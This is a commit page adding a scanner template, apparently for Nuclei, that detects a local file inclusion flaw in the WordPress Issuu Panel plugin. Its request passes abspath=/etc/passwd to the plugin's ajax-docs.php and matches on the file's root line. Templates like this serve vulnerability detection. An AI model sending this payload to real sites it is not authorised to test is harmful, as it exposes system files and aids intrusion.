Create wp-plugin-issuu-panel-lfi.yaml

patch-1
Roberto Nunes 2021-09-24 19:51:05 +09:00 committed by GitHub
parent 42db7eee82
commit 2bdcba17ac
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: wp-plugin -issuu-panel-lfi
info:
name: Wordpress Plugin Issuu Panel - RFI & LFI
author: 0x_Akoko
severity: high
reference: https://cxsecurity.com/issue/WLB-2016030131
tags: wp,wordpress,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200